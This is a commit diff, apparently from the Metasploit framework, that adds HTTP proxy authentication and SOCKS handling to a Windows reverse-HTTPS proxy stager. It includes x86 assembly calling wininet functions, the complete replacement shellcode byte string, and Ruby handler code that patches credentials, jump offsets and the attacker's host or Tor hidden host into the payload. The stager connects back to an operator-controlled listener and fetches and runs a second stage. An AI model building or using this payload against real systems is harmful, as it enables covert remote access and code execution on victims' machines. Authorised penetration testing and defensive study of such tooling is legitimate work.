add http authentification and socks
parent
f48c70d468
commit
e28dd42992
Binary file not shown.
|
@ -16,7 +16,7 @@ load_wininet:
|
||||||
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
|
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
|
||||||
call ebp ; LoadLibraryA( "wininet" )
|
call ebp ; LoadLibraryA( "wininet" )
|
||||||
|
|
||||||
call internetopen
|
call internetopen
|
||||||
|
|
||||||
proxy_server_name:
|
proxy_server_name:
|
||||||
db "PROXYHOST:PORT",0x00
|
db "PROXYHOST:PORT",0x00
|
||||||
|
@ -33,7 +33,7 @@ internetopen:
|
||||||
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
|
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
|
||||||
call ebp
|
call ebp
|
||||||
|
|
||||||
jmp short dbl_get_server_host
|
jmp dbl_get_server_host
|
||||||
|
|
||||||
internetconnect:
|
internetconnect:
|
||||||
pop ebx ; Save the hostname pointer
|
pop ebx ; Save the hostname pointer
|
||||||
|
@ -49,6 +49,37 @@ internetconnect:
|
||||||
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
|
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
|
||||||
call ebp
|
call ebp
|
||||||
|
|
||||||
|
mov esi,eax ; safe hConnection
|
||||||
|
|
||||||
|
db "PROXY_AUTH_START" ; start marker for optional authentification, removed during payload creation
|
||||||
|
|
||||||
|
call set_proxy_username
|
||||||
|
proxy_username:
|
||||||
|
db "PROXY_USERNAME",0x00
|
||||||
|
set_proxy_username:
|
||||||
|
pop ecx ; Save the proxy username
|
||||||
|
push dword 15 ; DWORD dwBufferLength
|
||||||
|
push ecx ; LPVOID lpBuffer (username)
|
||||||
|
push byte 43 ; DWORD dwOption (INTERNET_OPTION_PROXY_USERNAME)
|
||||||
|
push esi ; hConnection
|
||||||
|
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
|
||||||
|
call ebp
|
||||||
|
|
||||||
|
call set_proxy_password
|
||||||
|
proxy_password:
|
||||||
|
db "PROXY_PASSWORD",0x00
|
||||||
|
set_proxy_password:
|
||||||
|
pop ecx ; Save the proxy password
|
||||||
|
push dword 15 ; DWORD dwBufferLength
|
||||||
|
push ecx ; LPVOID lpBuffer (password)
|
||||||
|
push byte 44 ; DWORD dwOption (INTERNET_OPTION_PROXY_PASSWORD)
|
||||||
|
push esi ; hConnection
|
||||||
|
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
|
||||||
|
call ebp
|
||||||
|
|
||||||
|
db "PROXY_AUTH_STOP" ; stop marker for optional authentification, removed during payload creation
|
||||||
|
|
||||||
|
|
||||||
jmp get_server_uri
|
jmp get_server_uri
|
||||||
|
|
||||||
httpopenrequest:
|
httpopenrequest:
|
||||||
|
@ -68,7 +99,7 @@ httpopenrequest:
|
||||||
push edx ; version
|
push edx ; version
|
||||||
push ecx ; url
|
push ecx ; url
|
||||||
push edx ; method
|
push edx ; method
|
||||||
push eax ; hConnection
|
push esi ; hConnection
|
||||||
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
|
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
|
||||||
call ebp
|
call ebp
|
||||||
mov esi, eax ; hHttpRequest
|
mov esi, eax ; hHttpRequest
|
||||||
|
|
|
@ -83,7 +83,7 @@ module ReverseHttp
|
||||||
# addresses.
|
# addresses.
|
||||||
#
|
#
|
||||||
def full_uri
|
def full_uri
|
||||||
if datastore['HIDDENHOST']
|
unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty?
|
||||||
lhost = datastore['HIDDENHOST']
|
lhost = datastore['HIDDENHOST']
|
||||||
else
|
else
|
||||||
lhost = datastore['LHOST']
|
lhost = datastore['LHOST']
|
||||||
|
@ -93,7 +93,7 @@ module ReverseHttp
|
||||||
end
|
end
|
||||||
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
|
lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
|
||||||
scheme = (ssl?) ? "https" : "http"
|
scheme = (ssl?) ? "https" : "http"
|
||||||
if datastore['HIDDENPORT']
|
unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0
|
||||||
uri = "#{scheme}://#{lhost}:#{datastore["HIDDENPORT"]}/"
|
uri = "#{scheme}://#{lhost}:#{datastore["HIDDENPORT"]}/"
|
||||||
else
|
else
|
||||||
uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/"
|
uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/"
|
||||||
|
@ -306,7 +306,7 @@ protected
|
||||||
end
|
end
|
||||||
|
|
||||||
# Activate a custom proxy
|
# Activate a custom proxy
|
||||||
i = blob.index("METERPRETER_PROXY")
|
i = blob.index("METERPRETER_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
|
||||||
if i
|
if i
|
||||||
if datastore['PROXYHOST']
|
if datastore['PROXYHOST']
|
||||||
if datastore['PROXYHOST'].to_s != ""
|
if datastore['PROXYHOST'].to_s != ""
|
||||||
|
@ -324,6 +324,19 @@ protected
|
||||||
proxyinfo << "\x00"
|
proxyinfo << "\x00"
|
||||||
blob[i, proxyinfo.length] = proxyinfo
|
blob[i, proxyinfo.length] = proxyinfo
|
||||||
print_status("Activated custom proxy #{proxyinfo}, patch at offset #{i}...")
|
print_status("Activated custom proxy #{proxyinfo}, patch at offset #{i}...")
|
||||||
|
#Optional authentification
|
||||||
|
unless (datastore['PROXY_USERNAME'].nil? or datastore['PROXY_USERNAME'].empty?) or
|
||||||
|
(datastore['PROXY_PASSWORD'].nil? or datastore['PROXY_PASSWORD'].empty?) or
|
||||||
|
datastore['PROXY_TYPE'] == 'SOCKS'
|
||||||
|
|
||||||
|
proxy_username_loc = blob.index("METERPRETER_USERNAME_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
|
||||||
|
proxy_username = datastore['PROXY_USERNAME'] << "\x00"
|
||||||
|
blob[proxy_username_loc, proxy_username.length] = proxy_username
|
||||||
|
|
||||||
|
proxy_password_loc = blob.index("METERPRETER_PASSWORD_PROXY\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
|
||||||
|
proxy_password = datastore['PROXY_PASSWORD'] << "\x00"
|
||||||
|
blob[proxy_password_loc, proxy_password.length] = proxy_password
|
||||||
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
@ -42,9 +42,11 @@ module ReverseHttpsProxy
|
||||||
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
|
OptPort.new('LPORT', [ true, "The local listener port", 8443 ]),
|
||||||
OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
|
OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]),
|
||||||
OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
|
OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]),
|
||||||
OptString.new('HIDDENHOST', [false, "The tor/i2p hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
|
OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]),
|
||||||
OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
|
OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]),
|
||||||
OptEnum.new('PROXY_TYPE', [true, 'HTTP or SOCKS proxy type', 'HTTP', ['HTTP', 'SOCKS']])
|
OptEnum.new('PROXY_TYPE', [true, 'HTTP or SOCKS proxy type', 'HTTP', ['HTTP', 'SOCKS']]),
|
||||||
|
OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]),
|
||||||
|
OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"])
|
||||||
], Msf::Handler::ReverseHttpsProxy)
|
], Msf::Handler::ReverseHttpsProxy)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
|
@ -37,30 +37,30 @@ module Metasploit3
|
||||||
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
"\x03\x7D\xF8\x3B\x7D\x24\x75\xE2\x58\x8B\x58\x24\x01\xD3\x66\x8B" +
|
||||||
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
"\x0C\x4B\x8B\x58\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24" +
|
||||||
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
"\x5B\x5B\x61\x59\x5A\x51\xFF\xE0\x58\x5F\x5A\x8B\x12\xEB\x86\x5D" +
|
||||||
"\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07" +
|
"\x68\x6E\x65\x74\x00\x68\x77\x69\x6E\x69\x54\x68\x4C\x77\x26\x07" +
|
||||||
"\xff\xd5\xe8\x0f\x00\x00\x00\x50\x52\x4f\x58\x59\x48\x4f\x53\x54" +
|
"\xFF\xD5\xE8\x0F\x00\x00\x00\x50\x52\x4F\x58\x59\x48\x4F\x53\x54" +
|
||||||
"\x3a\x50\x4f\x52\x54\x00\x59\x31\xff\x57\x54\x51\x6a\x03\x6a\x00" +
|
"\x3A\x50\x4F\x52\x54\x00\x59\x31\xFF\x57\x54\x51\x6A\x03\x6A\x00" +
|
||||||
"\x68\x3a\x56\x79\xa7\xff\xd5\xeb\x62\x5b\x31\xc9\x51\x51\x6a" +
|
"\x68\x3A\x56\x79\xA7\xFF\xD5\xE9\xC4\x00\x00\x00\x5B\x31\xC9\x51" +
|
||||||
"\x03\x51\x51\x68\x5c\x11\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff" +
|
"\x51\x6A\x03\x51\x51\x68\x5C\x11\x00\x00\x53\x50\x68\x57\x89\x9F" +
|
||||||
"\xd5\xe9\x4b\x00\x00\x00\x59\x31\xd2\x52\x68\x00\x32\xa0\x84\x52" +
|
"\xC6\xFF\xD5\x89\xC6\x50\x52\x4F\x58\x59\x5F\x41\x55\x54\x48\x5F" +
|
||||||
"\x52\x52\x51\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x6a\x10" +
|
"\x53\x54\x41\x52\x54\xE8\x0F\x00\x00\x00\x50\x52\x4F\x58\x59\x5F" +
|
||||||
"\x5b\x68\x80\x33\x00\x00\x89\xe0\x6a\x04\x50\x6a\x1f\x56\x68\x75" +
|
"\x55\x53\x45\x52\x4E\x41\x4D\x45\x00\x59\x6A\x0F\x51\x6A\x2B\x56" +
|
||||||
"\x46\x9e\x86\xff\xd5\x31\xff\x57\x57\x57\x57\x56\x68\x2d\x06\x18" +
|
"\x68\x75\x46\x9E\x86\xFF\xD5\xE8\x0F\x00\x00\x00\x50\x52\x4F\x58" +
|
||||||
"\x7b\xff\xd5\x85\xc0\x75\x1d\x4b\x74\x13\xeb\xd5\xe9\x49\x00\x00" +
|
"\x59\x5F\x50\x41\x53\x53\x57\x4F\x52\x44\x00\x59\x6A\x0F\x51\x6A" +
|
||||||
"\x00\xe8\xb0\xff\xff\xff\x2f\x31\x32\x33\x34\x35\x00\x68\xf0\xb5" +
|
"\x2C\x56\x68\x75\x46\x9E\x86\xFF\xD5\x50\x52\x4F\x58\x59\x5F\x41" +
|
||||||
"\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00" +
|
"\x55\x54\x48\x5F\x53\x54\x4F\x50\xEB\x48\x59\x31\xD2\x52\x68\x00" +
|
||||||
"\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x53\x89\xe7\x57\x68\x00" +
|
"\x32\xA0\x84\x52\x52\x52\x51\x52\x56\x68\xEB\x55\x2E\x3B\xFF\xD5" +
|
||||||
"\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xcd" +
|
"\x89\xC6\x6A\x10\x5B\x68\x80\x33\x00\x00\x89\xE0\x6A\x04\x50\x6A" +
|
||||||
"\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\x4b\xff\xff\xff"
|
"\x1F\x56\x68\x75\x46\x9E\x86\xFF\xD5\x31\xFF\x57\x57\x57\x57\x56" +
|
||||||
|
"\x68\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xD5" +
|
||||||
|
"\xEB\x49\xE8\xB3\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0" +
|
||||||
|
"\xB5\xA2\x56\xFF\xD5\x6A\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40" +
|
||||||
|
"\x00\x57\x68\x58\xA4\x53\xE5\xFF\xD5\x93\x53\x53\x89\xE7\x57\x68" +
|
||||||
|
"\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xE2\xFF\xD5\x85\xC0\x74" +
|
||||||
|
"\xCD\x8B\x07\x01\xC3\x85\xC0\x75\xE5\x58\xC3\xE8\xEC\xFE\xFF\xFF"
|
||||||
}
|
}
|
||||||
))
|
))
|
||||||
|
|
||||||
# Register proxy options
|
|
||||||
register_options(
|
|
||||||
[
|
|
||||||
OptAddress.new('PROXYHOST', [true, "The IP address of the proxy to use" ,"127.0.0.1"]),
|
|
||||||
OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ])
|
|
||||||
], self.class)
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -101,8 +101,40 @@ module Metasploit3
|
||||||
calloffset += 1
|
calloffset += 1
|
||||||
p[proxyloc-4] = [calloffset].pack('V')[0]
|
p[proxyloc-4] = [calloffset].pack('V')[0]
|
||||||
|
|
||||||
|
#Optional authentification
|
||||||
|
if (datastore['PROXY_USERNAME'].nil? or datastore['PROXY_USERNAME'].empty?) or
|
||||||
|
(datastore['PROXY_PASSWORD'].nil? or datastore['PROXY_PASSWORD'].empty?) or
|
||||||
|
datastore['PROXY_TYPE'] == 'SOCKS'
|
||||||
|
|
||||||
|
jmp_offset = p.index("PROXY_AUTH_STOP") + 15 - p.index("PROXY_AUTH_START")
|
||||||
|
#remove auth code
|
||||||
|
p = p.gsub(/PROXY_AUTH_START(.)*PROXY_AUTH_STOP/i, "")
|
||||||
|
else
|
||||||
|
username_size_diff = 14 - datastore['PROXY_USERNAME'].length
|
||||||
|
password_size_diff = 14 - datastore['PROXY_PASSWORD'].length
|
||||||
|
jmp_offset = 16 + #PROXY_AUTH_START length
|
||||||
|
15 + #PROXY_AUTH_STOP length
|
||||||
|
username_size_diff + # difference between datastore PROXY_USERNAME length and db "PROXY_USERNAME length"
|
||||||
|
password_size_diff # same with PROXY_PASSWORD
|
||||||
|
#patch call offset
|
||||||
|
username_loc = p.index("PROXY_USERNAME")
|
||||||
|
p[username_loc - 4, 4] = [15 - username_size_diff].pack("V")
|
||||||
|
password_loc = p.index("PROXY_PASSWORD")
|
||||||
|
p[password_loc - 4, 4] = [15 - password_size_diff].pack("V")
|
||||||
|
#remove markers & change login/pwd
|
||||||
|
p = p.gsub("PROXY_AUTH_START","")
|
||||||
|
p = p.gsub("PROXY_AUTH_STOP","")
|
||||||
|
p = p.gsub("PROXY_USERNAME", datastore['PROXY_USERNAME'])
|
||||||
|
p = p.gsub("PROXY_PASSWORD", datastore['PROXY_PASSWORD'])
|
||||||
|
end
|
||||||
|
#patch jmp dbl_get_server_host
|
||||||
|
jmphost_loc = p.index("\x68\x3a\x56\x79\xa7\xff\xd5") + 8 # push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" ) ; call ebp
|
||||||
|
p[jmphost_loc, 4] = [p[jmphost_loc, 4].unpack("V")[0] - jmp_offset].pack("V")
|
||||||
|
#patch call Internetopen
|
||||||
|
p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V")
|
||||||
|
|
||||||
# patch the LPORT
|
# patch the LPORT
|
||||||
if datastore['HIDDENPORT']
|
unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0
|
||||||
lport = datastore['HIDDENPORT']
|
lport = datastore['HIDDENPORT']
|
||||||
else
|
else
|
||||||
lport = datastore['LPORT']
|
lport = datastore['LPORT']
|
||||||
|
@ -116,7 +148,7 @@ module Metasploit3
|
||||||
|
|
||||||
# append LHOST and return payload
|
# append LHOST and return payload
|
||||||
|
|
||||||
if datastore['HIDDENHOST']
|
unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty?
|
||||||
lhost = datastore['HIDDENHOST']
|
lhost = datastore['HIDDENHOST']
|
||||||
else
|
else
|
||||||
lhost = datastore['LHOST']
|
lhost = datastore['LHOST']
|
||||||
|
|
Loading…
Reference in New Issue